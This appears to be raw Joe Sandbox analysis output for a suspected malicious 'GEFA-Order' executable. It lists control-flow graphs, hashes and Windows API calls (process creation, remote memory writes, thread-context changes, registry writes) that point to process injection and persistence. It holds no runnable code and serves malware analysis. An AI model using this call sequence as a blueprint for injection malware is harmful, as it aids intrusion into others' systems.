                                                              • Opcode Fuzzy Hash: a65c224f1fe09c03a18f9687f8a6ee6ac1ca2ccc6bdc5896980090588d85ce3a
                                                              • Instruction Fuzzy Hash: 18E05275816229DFEF60CF60DA48BD9BBB1EF05345F0051DA9609A32A1C7745A85CF41

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 985 6f179dd-6f17a58 989 6f17a91-6f17ab1 985->989 990 6f17a5a-6f17a64 985->990 997 6f17ab3-6f17abd 989->997 998 6f17aea-6f17b24 989->998 990->989 991 6f17a66-6f17a68 990->991 993 6f17a8b-6f17a8e 991->993 994 6f17a6a-6f17a74 991->994 993->989 995 6f17a76 994->995 996 6f17a78-6f17a87 994->996 995->996 996->996 999 6f17a89 996->999 997->998 1000 6f17abf-6f17ac1 997->1000 1004 6f17b26-6f17b30 998->1004 1005 6f17b5d-6f17bd2 CreateProcessA 998->1005 999->993 1002 6f17ac3-6f17acd 1000->1002 1003 6f17ae4-6f17ae7 1000->1003 1006 6f17ad1-6f17ae0 1002->1006 1007 6f17acf 1002->1007 1003->998 1004->1005 1008 6f17b32-6f17b34 1004->1008 1017 6f17bd4-6f17bda 1005->1017 1018 6f17bdb-6f17c23 1005->1018 1006->1006 1009 6f17ae2 1006->1009 1007->1006 1010 6f17b57-6f17b5a 1008->1010 1011 6f17b36-6f17b40 1008->1011 1009->1003 1010->1005 1013 6f17b42 1011->1013 1014 6f17b44-6f17b53 1011->1014 1013->1014 1014->1014 1015 6f17b55 1014->1015 1015->1010 1017->1018 1023 6f17c33-6f17c37 1018->1023 1024 6f17c25-6f17c29 1018->1024 1026 6f17c47-6f17c4b 1023->1026 1027 6f17c39-6f17c3d 1023->1027 1024->1023 1025 6f17c2b 1024->1025 1025->1023 1029 6f17c5b 1026->1029 1030 6f17c4d-6f17c51 1026->1030 1027->1026 1028 6f17c3f 1027->1028 1028->1026 1032 6f17c5c 1029->1032 1030->1029 1031 6f17c53 1030->1031 1031->1029 1032->1032
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06F17BC2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 21736419292e660e694c59bcff94e9f57381070b764524babebe3cbca4b08927
                                                              • Instruction ID: 57aa020ebb3ff980bb22c675272852aba38025c195324ecfd5ad23720102de46
                                                              • Opcode Fuzzy Hash: 21736419292e660e694c59bcff94e9f57381070b764524babebe3cbca4b08927
                                                              • Instruction Fuzzy Hash: 94814371D002498FDB50EFA9C8917EEBBF2FF48350F148529E859EB294DB749981CB81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1033 6f179e8-6f17a58 1035 6f17a91-6f17ab1 1033->1035 1036 6f17a5a-6f17a64 1033->1036 1043 6f17ab3-6f17abd 1035->1043 1044 6f17aea-6f17b24 1035->1044 1036->1035 1037 6f17a66-6f17a68 1036->1037 1039 6f17a8b-6f17a8e 1037->1039 1040 6f17a6a-6f17a74 1037->1040 1039->1035 1041 6f17a76 1040->1041 1042 6f17a78-6f17a87 1040->1042 1041->1042 1042->1042 1045 6f17a89 1042->1045 1043->1044 1046 6f17abf-6f17ac1 1043->1046 1050 6f17b26-6f17b30 1044->1050 1051 6f17b5d-6f17bd2 CreateProcessA 1044->1051 1045->1039 1048 6f17ac3-6f17acd 1046->1048 1049 6f17ae4-6f17ae7 1046->1049 1052 6f17ad1-6f17ae0 1048->1052 1053 6f17acf 1048->1053 1049->1044 1050->1051 1054 6f17b32-6f17b34 1050->1054 1063 6f17bd4-6f17bda 1051->1063 1064 6f17bdb-6f17c23 1051->1064 1052->1052 1055 6f17ae2 1052->1055 1053->1052 1056 6f17b57-6f17b5a 1054->1056 1057 6f17b36-6f17b40 1054->1057 1055->1049 1056->1051 1059 6f17b42 1057->1059 1060 6f17b44-6f17b53 1057->1060 1059->1060 1060->1060 1061 6f17b55 1060->1061 1061->1056 1063->1064 1069 6f17c33-6f17c37 1064->1069 1070 6f17c25-6f17c29 1064->1070 1072 6f17c47-6f17c4b 1069->1072 1073 6f17c39-6f17c3d 1069->1073 1070->1069 1071 6f17c2b 1070->1071 1071->1069 1075 6f17c5b 1072->1075 1076 6f17c4d-6f17c51 1072->1076 1073->1072 1074 6f17c3f 1073->1074 1074->1072 1078 6f17c5c 1075->1078 1076->1075 1077 6f17c53 1076->1077 1077->1075 1078->1078
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06F17BC2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 7dcd0860185a7701f5881c1e1fc038aa62ff1be75969982b3232e7fe0eac2714
                                                              • Instruction ID: 5c154c0c37492d2f608b595b575b0fd08fb30e621f5d5b3aa48a29f52b4bd733
                                                              • Opcode Fuzzy Hash: 7dcd0860185a7701f5881c1e1fc038aa62ff1be75969982b3232e7fe0eac2714
                                                              • Instruction Fuzzy Hash: 50814271D002498FDB50EFA9C8817EEBBF2FF48350F148529E859AB294DB749981CF81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1079 30ba928-30ba937 1080 30ba939-30ba946 call 30b90a8 1079->1080 1081 30ba963-30ba967 1079->1081 1088 30ba948 1080->1088 1089 30ba95c 1080->1089 1082 30ba97b-30ba9bc 1081->1082 1083 30ba969-30ba973 1081->1083 1090 30ba9c9-30ba9d7 1082->1090 1091 30ba9be-30ba9c6 1082->1091 1083->1082 1135 30ba94e call 30bafb0 1088->1135 1136 30ba94e call 30bafc0 1088->1136 1089->1081 1092 30ba9fb-30ba9fd 1090->1092 1093 30ba9d9-30ba9de 1090->1093 1091->1090 1096 30baa00-30baa07 1092->1096 1097 30ba9e9 1093->1097 1098 30ba9e0-30ba9e7 call 30b9cb8 1093->1098 1094 30ba954-30ba956 1094->1089 1095 30baa98-30bab58 1094->1095 1130 30bab5a-30bab5d 1095->1130 1131 30bab60-30bab8b GetModuleHandleW 1095->1131 1100 30baa09-30baa11 1096->1100 1101 30baa14-30baa1b 1096->1101 1099 30ba9eb-30ba9f9 1097->1099 1098->1099 1099->1096 1100->1101 1103 30baa28-30baa31 call 30b9cc8 1101->1103 1104 30baa1d-30baa25 1101->1104 1110 30baa3e-30baa43 1103->1110 1111 30baa33-30baa3b 1103->1111 1104->1103 1112 30baa61-30baa6e 1110->1112 1113 30baa45-30baa4c 1110->1113 1111->1110 1119 30baa91-30baa97 1112->1119 1120 30baa70-30baa8e 1112->1120 1113->1112 1115 30baa4e-30baa5e call 30b9cd8 call 30b9ce8 1113->1115 1115->1112 1120->1119 1130->1131 1132 30bab8d-30bab93 1131->1132 1133 30bab94-30baba8 1131->1133 1132->1133 1135->1094 1136->1094
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 030BAB7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 690a271cac6e2a104906d6b5fabe0cf9f72d2d318e34390d05d1cca6c95413da
                                                              • Instruction ID: 1b73908feffee6ee6d25f579af6f125c5768da307272c1d57b3ab052b5501482
                                                              • Opcode Fuzzy Hash: 690a271cac6e2a104906d6b5fabe0cf9f72d2d318e34390d05d1cca6c95413da
                                                              • Instruction Fuzzy Hash: 75716570A01B05DFDB64CF2AD44479ABBF5FF88200F048A2DD48ADBA40DB75E845CBA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1137 6f1988c-6f198f9 1140 6f19932-6f19952 1137->1140 1141 6f198fb-6f19905 1137->1141 1148 6f19954-6f1995e 1140->1148 1149 6f1998b-6f199ed CopyFileA 1140->1149 1141->1140 1142 6f19907-6f19909 1141->1142 1143 6f1990b-6f19915 1142->1143 1144 6f1992c-6f1992f 1142->1144 1146 6f19917 1143->1146 1147 6f19919-6f19928 1143->1147 1144->1140 1146->1147 1147->1147 1151 6f1992a 1147->1151 1148->1149 1150 6f19960-6f19962 1148->1150 1159 6f199f6-6f19a3e 1149->1159 1160 6f199ef-6f199f5 1149->1160 1152 6f19985-6f19988 1150->1152 1153 6f19964-6f1996e 1150->1153 1151->1144 1152->1149 1155 6f19970 1153->1155 1156 6f19972-6f19981 1153->1156 1155->1156 1156->1156 1157 6f19983 1156->1157 1157->1152 1165 6f19a40-6f19a44 1159->1165 1166 6f19a4e-6f19a52 1159->1166 1160->1159 1165->1166 1169 6f19a46 1165->1169 1167 6f19a62 1166->1167 1168 6f19a54-6f19a58 1166->1168 1171 6f19a63 1167->1171 1168->1167 1170 6f19a5a 1168->1170 1169->1166 1170->1167 1171->1171
                                                              APIs
                                                              • CopyFileA.KERNEL32(?,?,?), ref: 06F199DD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID:
                                                              • API String ID: 1304948518-0
                                                              • Opcode ID: 43a7e8794ccee43f28ce33e910f80af0a0fb19264aa0b4dfe5da300080902b83
                                                              • Instruction ID: a94094823315d60570712fd1fc6d8b5675d0debb5ef851e5fcf502692eaa89d1
                                                              • Opcode Fuzzy Hash: 43a7e8794ccee43f28ce33e910f80af0a0fb19264aa0b4dfe5da300080902b83
                                                              • Instruction Fuzzy Hash: E051A971D003588FDB50CFA9C8A57EEBBF2BF48350F148529D854EB284EBB49985CB81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1172 6f19898-6f198f9 1174 6f19932-6f19952 1172->1174 1175 6f198fb-6f19905 1172->1175 1182 6f19954-6f1995e 1174->1182 1183 6f1998b-6f199ed CopyFileA 1174->1183 1175->1174 1176 6f19907-6f19909 1175->1176 1177 6f1990b-6f19915 1176->1177 1178 6f1992c-6f1992f 1176->1178 1180 6f19917 1177->1180 1181 6f19919-6f19928 1177->1181 1178->1174 1180->1181 1181->1181 1185 6f1992a 1181->1185 1182->1183 1184 6f19960-6f19962 1182->1184 1193 6f199f6-6f19a3e 1183->1193 1194 6f199ef-6f199f5 1183->1194 1186 6f19985-6f19988 1184->1186 1187 6f19964-6f1996e 1184->1187 1185->1178 1186->1183 1189 6f19970 1187->1189 1190 6f19972-6f19981 1187->1190 1189->1190 1190->1190 1191 6f19983 1190->1191 1191->1186 1199 6f19a40-6f19a44 1193->1199 1200 6f19a4e-6f19a52 1193->1200 1194->1193 1199->1200 1203 6f19a46 1199->1203 1201 6f19a62 1200->1201 1202 6f19a54-6f19a58 1200->1202 1205 6f19a63 1201->1205 1202->1201 1204 6f19a5a 1202->1204 1203->1200 1204->1201 1205->1205
                                                              APIs
                                                              • CopyFileA.KERNEL32(?,?,?), ref: 06F199DD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID:
                                                              • API String ID: 1304948518-0
                                                              • Opcode ID: b9afe83c8017b9d763f4a8b9fda621b40e6ddbce738132d70d8cc240a4418fad
                                                              • Instruction ID: 9e7bf2704d71a828f1d794be7cff2852e3b352ddaec315d082d2bb1972a8dbca
                                                              • Opcode Fuzzy Hash: b9afe83c8017b9d763f4a8b9fda621b40e6ddbce738132d70d8cc240a4418fad
                                                              • Instruction Fuzzy Hash: 42518871D003598FDB50CFA9C8A17EEBBF2BF48350F188529D855EB284DBB49985CB81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1206 6f19c9d-6f19ca2 1207 6f19ca4-6f19ca5 1206->1207 1208 6f19c86-6f19c9b 1207->1208 1209 6f19ca6-6f19d0f 1207->1209 1208->1206 1214 6f19d11-6f19d1b 1209->1214 1215 6f19d48-6f19d65 1209->1215 1214->1215 1217 6f19d1d-6f19d1f 1214->1217 1221 6f19d71-6f19d7b 1215->1221 1222 6f19d67-6f19d6f 1215->1222 1218 6f19d21-6f19d2b 1217->1218 1219 6f19d42-6f19d45 1217->1219 1223 6f19d2d 1218->1223 1224 6f19d2f-6f19d3e 1218->1224 1219->1215 1226 6f19d82-6f19dba RegSetValueExA 1221->1226 1222->1221 1223->1224 1224->1224 1225 6f19d40 1224->1225 1225->1219 1227 6f19dc3-6f19e03 1226->1227 1228 6f19dbc-6f19dc2 1226->1228 1233 6f19e13 1227->1233 1234 6f19e05-6f19e09 1227->1234 1228->1227 1236 6f19e14 1233->1236 1234->1233 1235 6f19e0b 1234->1235 1235->1233 1236->1236
                                                              APIs
                                                              • RegSetValueExA.KERNEL32(?,?,?,?,00000000,?), ref: 06F19DAA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: 5e325986473457eb96692a300db9a3ef7bd4d920935bb20a0cfb89da16136919
                                                              • Instruction ID: 0aa186f76a807a5182812e7248bb9c0a98b3971a559c07d6ecd77a2ae55f36c1
                                                              • Opcode Fuzzy Hash: 5e325986473457eb96692a300db9a3ef7bd4d920935bb20a0cfb89da16136919
                                                              • Instruction Fuzzy Hash: BA518971D002589FDB64CFA9C8957EEBBF2FF49340F148429E854AB240DBB58846CBD1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1336 6f19ca8-6f19d0f 1338 6f19d11-6f19d1b 1336->1338 1339 6f19d48-6f19d65 1336->1339 1338->1339 1340 6f19d1d-6f19d1f 1338->1340 1344 6f19d71-6f19dba RegSetValueExA 1339->1344 1345 6f19d67-6f19d6f 1339->1345 1341 6f19d21-6f19d2b 1340->1341 1342 6f19d42-6f19d45 1340->1342 1346 6f19d2d 1341->1346 1347 6f19d2f-6f19d3e 1341->1347 1342->1339 1350 6f19dc3-6f19e03 1344->1350 1351 6f19dbc-6f19dc2 1344->1351 1345->1344 1346->1347 1347->1347 1348 6f19d40 1347->1348 1348->1342 1356 6f19e13 1350->1356 1357 6f19e05-6f19e09 1350->1357 1351->1350 1359 6f19e14 1356->1359 1357->1356 1358 6f19e0b 1357->1358 1358->1356 1359->1359
                                                              APIs
                                                              • RegSetValueExA.KERNEL32(?,?,?,?,00000000,?), ref: 06F19DAA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: 2e9af187bb93b3b04a9da6884892f1625ad7024365adb2996e5852c97f85725b
                                                              • Instruction ID: bb42a60c50a988c2db24dcb01fc94ee3d4131047d6c8565c3cba6f8edbf182e0
                                                              • Opcode Fuzzy Hash: 2e9af187bb93b3b04a9da6884892f1625ad7024365adb2996e5852c97f85725b
                                                              • Instruction Fuzzy Hash: 334154B1D002589FDB64CFA9C895BDEBBF2FF48350F148429E854AB240CBB59845CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1360 6f19ad4-6f19ad6 1361 6f19ad8-6f19adc 1360->1361 1362 6f19ade-6f19b47 1360->1362 1361->1362 1365 6f19b53 1361->1365 1367 6f19b80-6f19bdb RegOpenKeyExA 1362->1367 1369 6f19b49-6f19b4e 1362->1369 1365->1367 1368 6f19b55-6f19b57 1365->1368 1377 6f19be4-6f19c24 1367->1377 1378 6f19bdd-6f19be3 1367->1378 1370 6f19b59-6f19b63 1368->1370 1371 6f19b7a-6f19b7d 1368->1371 1369->1365 1372 6f19b65 1370->1372 1373 6f19b67-6f19b76 1370->1373 1371->1367 1372->1373 1373->1373 1375 6f19b78 1373->1375 1375->1371 1383 6f19c34 1377->1383 1384 6f19c26-6f19c2a 1377->1384 1378->1377 1386 6f19c35 1383->1386 1384->1383 1385 6f19c2c 1384->1385 1385->1383 1386->1386
                                                              APIs
                                                              • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 06F19BCB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: f52b78195ce756bc23e696e25373697156343023b0843afc2bd4a1b5eeefe803
                                                              • Instruction ID: b757c069fc49ecafbd080cb3d859c2b4ca9412cfbab9b2d4c529e69d1a9efbdb
                                                              • Opcode Fuzzy Hash: f52b78195ce756bc23e696e25373697156343023b0843afc2bd4a1b5eeefe803
                                                              • Instruction Fuzzy Hash: 6A4154B0D00259DFDB60CFA9C8A479EBBF5BF48740F14842AE854AB290DBB49945CF91
                                                              APIs
                                                              • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 06F19BCB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: a37d448046675c80eac3354b0e86af850273ee60065deeac113871e672782004
                                                              • Instruction ID: 90989cbcff5d689c5fafa3480d7cc60ef3b812cb1cf91d605fc9fe1cb1767b6c
                                                              • Opcode Fuzzy Hash: a37d448046675c80eac3354b0e86af850273ee60065deeac113871e672782004
                                                              • Instruction Fuzzy Hash: AB4153B1D003599FDB10CFA9C894B9EFBF5BF48750F14842AE819AB280DBB49841CF91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410817108.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 4acaa354215d091671591c8df993d942c2f00af0b6d72e6712f9cb454c3fd876
                                                              • Instruction ID: 45162a45d0afc94dcfe52f24a3db50d4dcd3f09c69e7206a91e13eb94f844275
                                                              • Opcode Fuzzy Hash: 4acaa354215d091671591c8df993d942c2f00af0b6d72e6712f9cb454c3fd876
                                                              • Instruction Fuzzy Hash: 0ED19971610606CFCB18DF28C58096AB7F6FFC8314B198969E85A8B365DB30F841CB91
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F18176
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 08ed8d02370011190eebbdac3e5e6ec1bdbf25fc9819522028960d348594acc7
                                                              • Instruction ID: e8086e600c64a5d2a5bbe37944960af7e5db847a126a93aa7c74c339c161fe38
                                                              • Opcode Fuzzy Hash: 08ed8d02370011190eebbdac3e5e6ec1bdbf25fc9819522028960d348594acc7
                                                              • Instruction Fuzzy Hash: 78313E318093889FCB11DFA9D804BEFBFF8EF4A300F04845AE464AB291C7795944CBA1
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F18298
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: c4e797eb0d04430889ed42d718f48af21a31e45631c8d05e3ccfc7090102113b
                                                              • Instruction ID: bbaccaaeacec120a614891adbac5edb88e7f719e8cfe284f3c491344d71dbc3c
                                                              • Opcode Fuzzy Hash: c4e797eb0d04430889ed42d718f48af21a31e45631c8d05e3ccfc7090102113b
                                                              • Instruction Fuzzy Hash: EB2155B58003499FDF10CFA9C985BEEBBF4FF48310F14882AE918A7240D7789941CBA0
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F18298
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: b7436d9854ec431e8d2d3b1f45079af3a9a1de4e5a78124f6f28a29aebc73033
                                                              • Instruction ID: 4f685a1eb56ff2f6bc725f70cac21f1d63cf24d895531fa918deee2d16dec43d
                                                              • Opcode Fuzzy Hash: b7436d9854ec431e8d2d3b1f45079af3a9a1de4e5a78124f6f28a29aebc73033
                                                              • Instruction Fuzzy Hash: 032115759003499FDB10CFA9C985BDEBBF5FF48310F14842AE919A7240D7799954CBA0
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030BCEE6,?,?,?,?,?), ref: 030BCFA7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 8b300800fc4875d078ce2659af1f54d1ae277f6b40cf062d0dbcdaa11d0b5402
                                                              • Instruction ID: 49e47b6dc989d12ffc27196ab4f1bdae1ba4f463aaaa01b8cf9bc358cf9b1fed
                                                              • Opcode Fuzzy Hash: 8b300800fc4875d078ce2659af1f54d1ae277f6b40cf062d0dbcdaa11d0b5402
                                                              • Instruction Fuzzy Hash: C52116B5901249AFDB10CF9AD484ADEFFF8FB48320F14845AE914A3350D375A940CF65
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F17D66
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 37d2994fd132c0a62ad337bd293522c8d1d068b9eead93d646cbc92242065016
                                                              • Instruction ID: 04261efcaf6aa74d73dd17d576daa9445bf7d1916d4b0fdf3eb217903af3683e
                                                              • Opcode Fuzzy Hash: 37d2994fd132c0a62ad337bd293522c8d1d068b9eead93d646cbc92242065016
                                                              • Instruction Fuzzy Hash: 8E2138B1D003098FDB10DFAAC8857EEBBF5EF48314F14842AD959A7240D7789A44CFA1
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030BCEE6,?,?,?,?,?), ref: 030BCFA7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 29da0710f37d27bfa72e2deb4838585e53756e7c5ee3b16ad3f6cb029123474f
                                                              • Instruction ID: 3628a0e413f220132d315f05723a38301299d5a444c58e35e6488826f286e818
                                                              • Opcode Fuzzy Hash: 29da0710f37d27bfa72e2deb4838585e53756e7c5ee3b16ad3f6cb029123474f
                                                              • Instruction Fuzzy Hash: D82114B5900249DFDB10CF9AD884AEEFBF8FB48310F14846AE918A3350D374A954CFA5
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F17D66
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 44efe3f485ad572a7b710e7db7236c5b84e452506e13cd8d38666631cbd59ca7
                                                              • Instruction ID: 22ee7b3399952771a11918a23c2aa055345479457dfd6adb776a4bad2b29ec62
                                                              • Opcode Fuzzy Hash: 44efe3f485ad572a7b710e7db7236c5b84e452506e13cd8d38666631cbd59ca7
                                                              • Instruction Fuzzy Hash: 5C2127B1D003098FDB10DFAAC4857EEBBF5EF48214F14842AD559AB240DB789A44CFA5
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06F1866C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 8b0f5a2d32a047828a1b0d24cad8fa16ae556307be34b49a5f0b2c648055ef27
                                                              • Instruction ID: 520b6b534b97d26fa56efcc0c47225ed728671a2c4659708ada4fe07a77baef4
                                                              • Opcode Fuzzy Hash: 8b0f5a2d32a047828a1b0d24cad8fa16ae556307be34b49a5f0b2c648055ef27
                                                              • Instruction Fuzzy Hash: 1A2137718003498FDB10CFAAC444BEEBBF4FF49310F14842AD459A7240D7799944CFA1
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06F1866C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 853905d4f2f5b329ed5e16067edf57e881a53c091b14b68cf552d6f7a04093e7
                                                              • Instruction ID: ca0dbc08939e4689ef7aa5a5e9359bc7be7384ac17d76fb40af433225bbc9b2d
                                                              • Opcode Fuzzy Hash: 853905d4f2f5b329ed5e16067edf57e881a53c091b14b68cf552d6f7a04093e7
                                                              • Instruction Fuzzy Hash: 88211571C003498FDB10DFAAC844BEEBBF4EF48220F14842AD569A7240C7799944CFA1
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 030B949D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
